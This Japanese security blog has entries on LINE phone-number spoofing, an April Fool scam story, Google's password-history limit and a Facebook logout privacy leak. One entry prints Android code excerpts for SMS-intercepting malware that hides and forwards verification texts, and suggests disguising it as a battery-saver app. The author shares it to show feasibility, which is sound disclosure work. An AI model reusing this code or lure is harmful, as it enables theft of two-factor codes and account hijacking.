pochi-pの絵日記

2014-07-21 LINE(電話)とSMS認証の話

[][]LINE(電話)とSMS認証の話 LINE(電話)とSMS認証の話を含むブックマーク

以前当ブログでは、LINE電話問題をネタにしてエイプリルフール記事を書きました。

その際LINEをモデルとした『通話アプリL』にて認証SMSをマルウェア経由で盗まれるシナリオを書きました。

『通話アプリL』登録時に藤田口关さんのスマホで認証SMSを受け取り、不正アプリがそのSMS内容を犯人に転送&隠蔽して『通話アプリL』の登録を完了していた。

http://d.hatena.ne.jp/pochi-p/20140401#p1

上記は架空の悪用シナリオですが、実際にそんな事が可能かどうかピンと来ない人もいるでしょう。*1 という訳で…


SMS転送&隠蔽するマルウェアを作ってみたよ!

自分でマルウェアを作って動作確認してみました。

最初このブログに実際に動くプログラムをUpしようかと当初思ってましたが、不正指令電磁的記録の「配布」や、犯罪要件となる「作成」になる恐れがある*2為要点の解説と画面キャプチャだけ掲載する事にしました。


マルウェア作成のポイントはこれだけです。

  • SMS受信のブロードキャストを受けるReceiverを用意。priorityの指定を最高値に。
  • 特定条件下でSMSを隠蔽&転送。他アプリに対してSMSを隠蔽する際はBroadcastReceiver#abortBroadcast()を呼ぶだけ。
  • Receiverで受け取ったSMSを転送する処理するは別途Serviceで実装。(IntentServiceでもOK)
  • 別途コントロールするWEBアプリを用意。

部分的にソースを抜粋すると以下の様な感じです。

AndroidManifest.xmlの抜粋

<receiver android:name="SmsYokodoriReceiver">
    <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
    </intent-filter>
</receiver>

SmsYokodoriReceiver.javaの抜粋

Bundle bundle = intent.getExtras();
Object messages[] = (Object[]) bundle.get("pdus");
// 略
Intent serviceIntent = new Intent(context.getApplicationContext(), SmsTensouService.class);
serviceIntent.putExtra("pdus", messages);
context.startService(serviceIntent);
abortBroadcast(); // ブロードキャストを破棄する。「アプリのみんなにはナイショだよ!」

上記のような記述が出来ればOKなので、作成難易度はEASYだと思います。(というかすでにそういうマルウェアって沢山出てます *3

WEBアプリ側もPHPでGET/POSTパラメーター取ってsqlite3読み書きしてhtmljsonの出力するだけです。



SMS転送&隠蔽するマルウェアを動かしてみるよ!

まずはマルウェアのインストールです。こちらは電話番号(=SMS宛先)を勝手に使われる被害者側のスマホに入れます。

内容は「電池長持ち!」とかの名前にして小さく注意書きに「個人の感想であり、効果には個人差があります」と書いておけば何人かは騙されるでしょう。*4

f:id:pochi-p:20140721204445p:image:w180,h320

↑マルウェアの使用する権限です。

大手アプリベンダーのお陰でどんな権限も黙認してインストールさせるのが(分からない人にとっての)常識とされてしまってるので、これくらいの権限も気にならないでしょう

続きを読む

*1:約1ヶ月でLINE電話の仕様は変更されましたが、その間に実際にこれが悪用されたかどうかは分かりません。

*2: 参考 http://takagi-hiromitsu.jp/diary/20061022.html

*3モバイルマルウェアを用い2要素認証のコードを盗む手口に注意 http://www.itmedia.co.jp/enterprise/articles/1404/18/news045.html http://securityblog.jp/news/20140428.html ユーザーを騙してSMSマルウェアをインストールさせるベトナム語のアダルトアプリ http://ascii.jp/elem/000/000/863/863130/ Android.FakeLookout テクニカルノート | シマンテック 日本 http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2012-101919-2128-99&tabid=2

*4:だって公式キャリアセキュリティ会社が(以下略

トラックバック - http://d.hatena.ne.jp/pochi-p/20140721

2014-04-01 架空音声合成ソフトの声優家族、振り込め詐欺被害に

[][][][]架空音声合成ソフトの声優家族、振り込め詐欺被害に 架空音声合成ソフトの声優家族、振り込め詐欺被害にを含むブックマーク

架空声優の藤田口关(ふじたこうしょう)さんのご家族が、振り込め詐欺被害にあったそうです。

f:id:pochi-p:20140401001126p:image

藤田口关さんは架空音声合成ソフト「ネ刃音ミクDEYO(ねはねみくデヨー)」の中の人として有名な方ですが、今回犯人は「ネ刃音ミクDEYO」で作成した合成音声を使って家族を騙し通したそうです。幸い犯人グループはすぐ逮捕され、被害額も全額取り戻すことが出来ました。

逮捕された犯人グループの供述によると、あらかじめ個人情報搾取する不正アプリを「電池長持ち」等と偽って配布し、その不正アプリ被害者の一人であった藤田口关さんのスマートフォンから電話帳・通話履歴・通話音声(短時間)・メールデータ・スケジュール情報等を盗み出したそうです。盗み出した情報から藤田口关さんが有名声優である事を特定し、あらかじめ「ネ刃音ミクDEYO」で特定の会話音声を作成して藤田口关さんの家族に電話をしたとの事。犯行タイミングも藤田口关さんがスマートフォンを使わないタイミングを調査の上狙いすましたという。


「先輩声優が重度の難病にかかり、すぐ治療しないとあと2週間持つかどうかも怪しいらしい。海外の治療しか方法は無いが保険がきかないのでとても高額だ。今先輩の家族や声優仲間で金策に走っていて、有難い事にファンからのカンパも集まってるらしい。でもまだ目標額には届かない状態。必ず返すので今余裕のある分だけでも貸してくれないか。カンパ口座教えるのでそこに振り込んで欲しい、振込額は後で私が働いて返すから」という嘘のシナリオで相談し、想定パターンにない状況では嗚咽や「どうしよう」等の台詞で時間稼ぎをし、その間に新たな合成音声をリアルタイム作成していたそうだ。

先輩声優の病気やファンからのカンパの信憑性を上げる為、電話の後に先輩声優所属事務所の偽サイトアドレス書かれたSMSを藤田口关さんのスマホから不正アプリが送りつけ、架空のニュースリリースやカンパページに誘導までする徹底ぶりだったらしい。デフォルト設定で「URL入りのSMSを迷惑メール扱いする」事業者もあるが、ご家族の携帯電話はデフォルト設定がそうなっていない携帯電話会社のものと電話帳のメールアドレスから特定され、またご家族も設定の事を知らずデフォルト設定のままだったようだ。


ご家族の携帯電話に通知された電話番号は、藤田口关さんの携帯電話と見かけ上同じ番号が表示されていた。大手通話アプリ「LINI三(えるあいえぬあいさん)」(以下『通話アプリL』とする)の電話機能*1を悪用し、『通話アプリL』登録時に藤田口关さんのスマホで認証SMSを受け取り、不正アプリがそのSMS内容を犯人に転送&隠蔽して『通話アプリL』の登録を完了していた。この為犯人が『通話アプリL』からご家族の携帯電話へ発信する際、藤田口关さんの携帯電話からの着信の様に表示されてしまったのだ。なお藤田口关さんは『通話アプリL』を使っていない為、開発会社が言うような「不正される可能性は極めて低い! それに本人が気付きますから!(キリッ)」という主張は空回りに終わったようだ。


藤田口关さんのご家族は「いつもウチの子が『あの先輩が私の目標。私はまだまだだけど、これからも同じ業界のライバルとして認められるよう頑張っていきたい』とよく話していて、大事な先輩だという話を聞かされていた。先輩もウチの子を妹分のように可愛がってくれていて、何度か対面した事もある。その先輩が難病にかかったらウチの子は取り乱して当然だと疑問に思わずお金を振り込んでしまった。ウチの子の個人口座宛なら把握しているので騙されなかったかもしれないが、別名義の口座だったので疑問に思えなかった」とコメントしている。


バーチャルセキュリティ専門家の高木喬(こうききょう)さんにこの件で取材をしたところ

  • 公式マーケットの審査も不正アプリを排除しきれていない。スマホアプリの権限確認が周知されておらず、何より大手アプリが本来不必要な権限まで過剰に要求している為「こういう権限を要求するアプリは入れない」というのが難しい現状。単なる広告の為だけに必要以上の権限やプライバシー情報を収集しているのも横行しており問題だ。広告の為だけならUUID以上を要求すべきでない。
  • 「電池長持ち」アプリ等は通信キャリアが広告を流していたりする為たちが悪い。類似品と正規品の違いも分かり辛い。省電力設定はOSやキャリアのプリインアプリだけで完結させて追加インストールさせない風潮が望ましいだろう。
  • 『通話アプリL』が認証時の番号と同じ番号のスマホ上でしか通知しない制限があれば問題は少なかったかもしれないが、そんな制限は設けられていない。これは設計ミスではないか。050番号を使いたくないからといってこの実装は妥当と思えない。
  • 『通話アプリL』の電話発信機能より以前にも、海外のコールバックサービスが問題になる事例が何件か報告されていたようだ。現在は一部の携帯電話会社だけが「非通知/通知不可能」となっているが、将来的に他社も追随してくる可能性もある。『通話アプリL』が何もせず現状維持であれば、いずれ『通話アプリL』からの発信は全て「非通知/通知不可能」となり、ユーザーイメージも低下してしまうだろう。皆他の050利用サービスに移行していくかもしれない。
  • 音声合成ソフトは将来的に「本人から若干の音声を録音」しただけで本人音声をほぼ全て再現出来るようになるだろう。今回は架空音声合成ソフト「ネ刃音ミクDEYO」の声優が狙われた訳だが、単なる一般人でも会話を録音される事で同じ被害に遭う可能性がありえる。今後は家族かどうかを判断するには「声が同じか」ではなく家族同士を認証するやりとり*2で判断していくべきだろう。ソフトの進化を待たずとも、詐欺師は「人力VOCALOID」技術*3や高度なモノマネ技術を使って詐欺を実行可能だ。

等のコメントを頂いた。

なお取材時には額に「喬」と書かれた紙を貼っており、ハマチの照り焼きをハンガーに吊るして石斧を延々投げつけていて何だか怖かった*4。バーチャルセキュリティの専門家よりセキュリティの専門家に取材した方が良かったかもしれない。

幸い同様の事件は筆者の夢の中でしか聞いた事がないので、現実でこんなニュースを耳にしない事を願いたい。

*1IP電話ベース+αで廉価に電話をかけるサービス。『通話アプリL』から通常の電話回線にかけれるのが売りであるが、『通話アプリL』が利用スマホと同じ電話番号を本来使えないところを、『認証済み電話番号と同じ番号』で着信通知する仕組みをもっている。しかしシンプルに言うとただの番号偽装であるので、安全寄りに設定している回線業者ではこれを正当な番号通知とは見做さない。

*2:参考『振り込め詐欺対策として、本人認証を導入しましょう(Gmail風)』 http://d.hatena.ne.jp/pochi-p/20121230#p1

*3:「人力VOCALOID」詐欺の一例。 http://www.nicovideo.jp/watch/sm212890 D 被害者の精神的ダメージが心配だ。

*4:「架空の高橋さん」の正体に関する考察→ http://b.hatena.ne.jp/pochi-p/20140314#bookmark-186229066

2014-03-31 LINE電話の番号通知問題について

[][]LINE電話の番号通知問題について LINE電話の番号通知問題についてを含むブックマーク

LINE電話の番号通知機能が、色々騒ぎになっています。そして公式発表が出ました。「本来の電話番号の持ち主に気づかれずに、第三者が電話番号をなりすましたり、偽装をし、悪用をする可能性・発生の頻度は極めて低く、現実的には極めて困難だと考えられます」「非常に限定的な状況」「引き続き、安心して「LINE電話」をご利用ください」等と、安全宣言をしている形になります。

しかし本当に安心出来るのでしょうか? 折角なのでエイプリルフールネタに組み込みつつ考えてみます。まずはそちらをどうぞ。


[0401][Android][security][neta]架空音声合成ソフトの声優家族、振り込め詐欺被害に

http://d.hatena.ne.jp/pochi-p/20140401#p1


いかがでしたか? 上記は現実的な範囲で一部フィクション入りでLINE電話の悪用シナリオを書いてみたものです。ターゲットがVOCALOID・VOICELOID・UTAU等の中の人達だけに限定される事以外は、全部現時点での技術水準で出来る悪事になってます。

上記のエントリは「電話番号の正当な持ち主と誤認させる」為に色々手を尽くした話です。「電話番号の正当な持ち主を犯罪の隠れ蓑にする」だけだったら、こんなにも堂々とやる方法があるみたいですね。

開き直った犯罪者怖いです!!

すまほん!!さんでも以下の様な手口が解説されています。

認証コードが手に入るなら携帯電話Bは誰のものでも構いません。例えば、ロック画面で「通知の表示」と「Siri」が有効になっているiPhoneの場合、Siriから自局番号を聞き出し、通知から認証コードを読み取るのは、造作も無いことです。

http://smhn.info/201403-line-call-2

カジュアルな(?)悪事としても、「知人(A)の携帯電話を借りるor目を盗んで使う → SMS認証通過 → LINE電話で知人(A)の彼女である知人(B)に発信 → 浮気相手を装って情事の最中の嬌声(AVでも可)を聞かせる → (A)と(B)が修羅場」なんてのを誰かやりそうですね…。


結局の所、@さんによる「LINE電話の電話番号偽装被害(なりすまし)を防ぐ対策について | LINEの仕組み」というエントリに書かれてるように「不正利用されない為にはLINEを使うしかない(非スマホユーザーには無理)」という結論なのが問題ですね。

ただ、この記事で紹介したように、一つ重要で興味深いのは、「嫌だ!」と思って「LINEなんて絶対に使ってたまるか!」ってLINEアカウントを作らないでいると、むしろなりすましに気が付きにくくなるよ、というところです。

http://did2memo.net/2014/03/29/line-call-narisumashi-taisaku/

LINEユーザー以外対策が出来ないとか、LINE社勝手すぎるでしょう。

他にも「SMS認証してから解約。解約後別の人が契約してもLINE電話から発信」とかの問題が指摘されています。


そしてLINE株式会社が納得(妥協?)出来そうな改善案は一つです。

「LINE電話の番号通知は、SMS認証した番号と同じ電話機からしか通知出来ないようにする。それ以外の端末(タブレット上のLINEアプリ+SMS見るだけのガラケー等)からは発信可能だが通知不可にする」*1

(いさぎよく「LINE電話の番号通知は廃止する」でも良いですが、流石にそれはないでしょうね。)


ビジネス上「050でなくオリジナルと同じ番号を使って着信通知が出来る」のを売りにしているのでしょうが、中身は単なる海外経由の電話番号偽装です。キャリアが「日本国内はまだ信用出来るけど、海外は怖いねー」と通知番号を信用しなくなればすぐに使えなくなる手法です。

ドコモ広報によると、「LINE電話では、1度国際網を介して相手の端末に発信することになります。弊社では、電気通信事業者協会(TCA)が定めた『発信者番号偽装表示対策ガイドライン』に準じ、ドコモ端末以外からの国際電話基本的に『非通知』などの表示となります。ただし、海外にはさまざまな事業者があるので、それら全てを非通知にするように対応できているわけではありません」とのことでした。

http://www.itmedia.co.jp/mobile/articles/1403/25/news035.html

昔似た話が記事になったりしました。

「振り込め詐欺」は発信者番号を偽装する?

http://slashdot.jp/story/05/01/22/1435248/

★ガイドが実証★発信者番号の偽装は簡単だった! ◆ 発信者番号の偽装に騙されるな!

http://allabout.co.jp/gm/gc/48282/

当時は「NTTだけが騙されない」という感じでした。現在はそこにドコモも加わった感じなのでしょうかね?

auソフトバンクウィルコムイーモバイルは回線の技術的仕様かお金の問題か分かりませんが、今のところLINE電話の番号通知を信用するみたいです。しかしもしLINE電話が悪用され、海外経由の電話番号偽装が一律に問題視されれば各社表示しないようになっていくでしょうね。そうなると困るのはアドバンテージを失うLINE自身でしょう。

暢気かつ無責任に「本来の電話番号の持ち主に気づかれずに、第三者が電話番号をなりすましたり、偽装をし、悪用をする可能性・発生の頻度は極めて低く、現実的には極めて困難だと考えられます」「非常に限定的な状況」「引き続き、安心して「LINE電話」をご利用ください」等と言ってないで、やれる事は全部やっときましょうよ。


何よりLINEはGogolookと合同でこんなアプリを出しています。

LINE whoscall - 発信元表示・着信拒否 - Google Play の Android アプリ

https://play.google.com/store/apps/details?id=gogolook.callgogolook2

知らない番号からの電話・SMSの発信元表示や着信拒否ができるアプリ「LINE whoscall」登場!(Android向け)

http://official-blog.line.me/ja/archives/35538408.html

だったらLINE電話で050番号を普通に使って、アプリ側で「この050番号はリアル電話番号090-****-****のものだな」と解釈し着信表示を「山田花子(LINE電話経由)」と表示するようにする事も可能でしょう。改善方法が無いならまだしも、改善方法があるのに何もしないとかJALとかANAとかと同じレベルの間違いじゃないですかね?


最後に、石川温さんの記事を引用して終わります。

ここ最近、子どもが巻き込まれる犯罪で必ず「LINEを介して連絡」といったように、メディアでやたらとLINEが犯罪の温床といったような報道がされているが、これは「交通事故が道路で起こった」と同じ表現であり、事故が発生したからと言って、道路が悪いわけではない。本来ならば、犯罪が発生したことで、LINEが攻められる立場ではないはずなのだが、電話番号偽装の件は、LINEが自ら過ちを犯しているような気がしてならない。

http://www.itmedia.co.jp/mobile/articles/1403/28/news021.html

おまけ

どさくさに紛れて言いますがいい加減電話帳読み取り権限もアプリ本体』から外しましょうよ。エイプリルフール記事のシナリオは、『大手アプリがガンガン権限付けまくる(Google系アプリも大概酷い)から利用者への啓蒙も進まず問題アプリの区別が出来ない人だらけに』なった為リアリティのある話になっちゃってるんですよ? 大手なら大手らしく見本となるような振る舞いしてくださいよ。

参考:

READ_CONTACTSなしで電話帳から電話番号を取得する方法

http://www.taosoftware.co.jp/blog/2012/08/read_contacts.html

[Android][security][text]そのスマホアプリ、権限を分離しませんか?

http://d.hatena.ne.jp/pochi-p/20120702#p1

*1:この対策をやって、それでもLINEの改造版or機能互換アプリからのアクセスをどうするかって問題が出てきます。こっちに関して「〜問題になるのは極めて稀」と開き直るのは(良くないけど)納得出来るのですが、この段階に達する前に開き直ってるのは非常に納得いきませんね。

トラックバック - http://d.hatena.ne.jp/pochi-p/20140331

2013-01-31 Googleで以前使用したパスワードを設定したいなら!

[][][]Googleで以前使用したパスワードを設定したいなら! Googleで以前使用したパスワードを設定したいなら!を含むブックマーク

Gmailのパスワードが戻せない!

みなさんGoogleアカウントを使ってますか? IDとパスワードを入力してGmailとか使うと便利ですよね♪


ただしGoogleで設定していたパスワードを変更した時、ちょっと面倒な問題があります。

なんと、Googleさんは「以前使用したパスワードは再度設定出来ない」のです!


こんな風にパスワードを変更しようとしても…

f:id:pochi-p:20130201012141p:image

↓↓↓

f:id:pochi-p:20130201012140p:image

「このアカウントで使用したことのないパスワードを選択してください。」って言われちゃう!


これはちょっと悲しいですよね。ちょっとテストのつもりで変更した、確かに変更したのだけどやはり戻したくなった*1時などに困ってしまいます。なんとか元のパスワードに戻す方法は無いものでしょうか??


考えた結果、「Googleさんの記憶から無くなってしまえば、以前のパスワードも再び使えるようになる」のではないかという仮説が浮かびました。

Googleさんが覚えてないなら、「以前のパスワードです」と気付かれる事も無いはずですからね!!


実験

ということで、次のようにやってみましょう。

順番にパスワードを変更していって、最後まで変更したら以前のパスワードへ変更してみる実験です。

この実験でどれくらい前までのパスワードをGoogleさんが覚えているかハッキリしますね。

とりあえず煩悩の数だけパスワードを変更してみましょう。

omaenobonnouha1

omaenobonnouha2

omaenobonnouha3

〜省略〜

omaenobonnouha106

omaenobonnouha107

omaenobonnouha108

108回変更後、古いパスワードに戻す実験の結果は次のようになりました。

omaenobonnouha108 → omaenobonnouha107 ×エラー!

omaenobonnouha108 → omaenobonnouha106 ×エラー!

〜省略〜

omaenobonnouha108 → omaenobonnouha8 ×エラー!

omaenobonnouha108 → omaenobonnouha7 成功!!

omaenobonnouha108 → omaenobonnouha6 ○成功!!

最後に設定した"omaenobonnouha108"の状態から、"omaenobonnouha7"以前のパスワードになら戻せるみたいですね!

「Googleさんの記憶から無くなってしまえば、以前のパスワードも再び使える」という仮説は当たっていたようです。


結論

どうやら過去のパスワード(現在設定中のパスワードは除く)は100件記録されているようですね。

現在のパスワード……1件

過去のパスワード……100件

数字としてもスッキリしてますし、これで間違いないでしょう。


皆さんももしGmail等を使っていてGoogleのパスワードを以前のものに戻したくなったら、是非「100回無関係なパスワードに変更して、それから以前のパスワードに変更」してみてくださいね♪

でも間違って「他人にばれてるパスワード」に変更しちゃダメですよ! それとGoogleさんから「Google アカウントのパスワードが変更されました」ってメールが沢山飛んでくるから、通知先のメールBOX空き容量に気をつけてね!!

*1:『彼氏への思いをパスワードに込めてたけど彼氏と不仲になりパスワードを変えた。でも仲直りしたのでパスワードも戻したい!』なんて人もいるかもしれませんね。喧嘩して「Hamachi Oni-chyan Die-suki!!」から「Hamachi Oni-chan no baka! peropero-seijin!! Hamachi no Teriyaki!!」にしたけどヤッパリ戻したいとか。

2013-01-30 Facebook【ログアウト後の】プライバシー漏洩問題

[][]Facebook【ログアウト後の】プライバシー漏洩問題 Facebook【ログアウト後の】プライバシー漏洩問題を含むブックマーク

前置き

Facebookでは様々な設定項目があり、プライバシー情報を個別に公開/非公開にしたり、検索可否を指定する事が出来ます。きちんと設定すれば、「メールアドレスで検索して氏名を特定」はされないらしいです。

私もそう聞いていたのですが、確認してみたところログイン画面の仕様により【メールアドレスからFB上の氏名&顔写真が分かる】ケースに遭遇しました。

ただし前提条件がかなり厳しいので、影響範囲は小さいと思います(多分)。ちょっとした雑学のつもりで気楽にお読み下さい。


と言うことでさっさと実例。

「普通のログインエラー画面」の例
  1. 綺麗な環境*1Facebookを開く。
  2. ログイン画面でメアドを入力&間違ったパスワードを入力(=未入力可)
  3. エラー画面になる

f:id:pochi-p:20130129234818p:image


ありがた迷惑なログインエラー画面」の例
  1. ブラウザでFacebookにログイン
  2. Facebookからログアウト、
  3. ↑のログアウト時点でのCookie*2が残ってる状態でFacebookを開く
  4. ログイン画面で前回ログアウトしたメアドを入力&間違ったパスワードを入力(=未入力可)*3 *4
  5. エラー画面に氏名と顔写真が表示される!?

f:id:pochi-p:20130129234819p:image

なんということでしょう。「メールアドレスでFBアカウント検索不可」にしていても、後者の状況が成立するとアカウントの有無やFBの氏名がばれてしまいます! 後者が成立するような共用PC*5でFacebookを使用すると、意図せぬ情報漏洩が起きる可能性があるということですね!


まとめ&結論

上にも書いてますが、Cookieを一切残さない形であればこの問題は発生しません。ブラウザのシークレットモードを利用したり、ブラウザ終了時にCookie含む履歴を削除すれば大丈夫ですね。*6

ただし「ログアウトしたからアカウント情報は残ってない」と勘違いすると、Cookieが残ったままで問題が発生しうるわけですね。ここがちょっと厄介です。


「既にブラウザでFacebookを利用済みで、Cookieが残ってる」「前回ログインしたメールアドレスが分かる*7」といった条件が揃った時のみ発生する問題であり、影響範囲は広くないでしょう。

ただ全くあり得ない話では無いので「メアドと実名を紐づけられたくない」「FBの利用中かどうか知られたくない」という方は、くれぐれも共用PCでFacebookを利用しない*8ようご注意下さい。どうしても使わざるを得ないのなら、せめてCookieを残さないよう徹底してくださいね。

*1:初めてFacebookにアクセスするブラウザ・Facebookにアクセスした事があるがCookieを消去済みのブラウザ・ブラウザのシークレットモードなど、とにかくCookieがまっさらな状態です。

*2:完全な特定は出来ませんでしたが、どうやらCookieの「fr」「lu」「datr」辺りの情報(を組み合わせて?)前回ログインアカウントを特定しているような雰囲気です。

*3:前回のメールアドレスと別ならば普通のログインエラー画面になります。

*4:ログアウト直後に他のメールアドレスを試行した後でも、新たなログインの前に前回ログインしたメールアドレスを入力すればこの画面は出るみたいです。

*5ネカフェ・ホテル・学校・家族内・職場・公共施設で開放されているPC等々。

*6:メアドが記録されない様、ブラウザの入力補完機能オートコンプリート)にも気をつけて!

*7:Facebookのログイン画面でメールアドレスを総当たり入力が出来るかどうかは確認してません。逮捕されても困りますしw

*8:ちなみにキーロガーの仕組まれてる共用PCだったらパスワード含め重要情報丸ごと取られますので気をつけて下さいね!

トラックバック - http://d.hatena.ne.jp/pochi-p/20130130